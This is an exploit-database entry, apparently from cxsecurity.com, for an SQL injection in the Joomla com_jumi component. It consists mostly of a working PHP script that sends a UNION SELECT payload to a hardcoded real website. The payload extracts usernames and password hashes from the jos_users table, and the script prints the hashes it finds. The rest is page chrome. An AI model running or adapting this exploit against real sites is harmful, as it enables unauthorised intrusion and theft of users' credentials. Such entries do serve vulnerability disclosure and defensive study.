Joomla com_jumi - SQL Injection Exploit

2017.02.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php #Author: Mateus a.k.a Dctor - Hatbash br #fb : facebook.com/hatbashbr/ $host = "http://www.building.lv/"; $payload = "index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+"; $u = $host.$payload; $random= array( 'http'=>array( 'method'=>"GET", 'header'=>"Accept-language: en\r\n" . "Cookie: foo=bar\r\n" . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1\r\n" )); $agent= stream_context_create($random); $p = file_get_contents($u, false, $agent); if(preg_match_all('/([0-9a-fA-F]{32})/', $p, $r)){ $string = implode(", ", $r['0']); echo "[+] Target: ".$host ."\n"; echo "[+] Passwords :\n"; echo "\�33[01;31m" .$string. "\n"; } else{echo "Not Vull";} ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top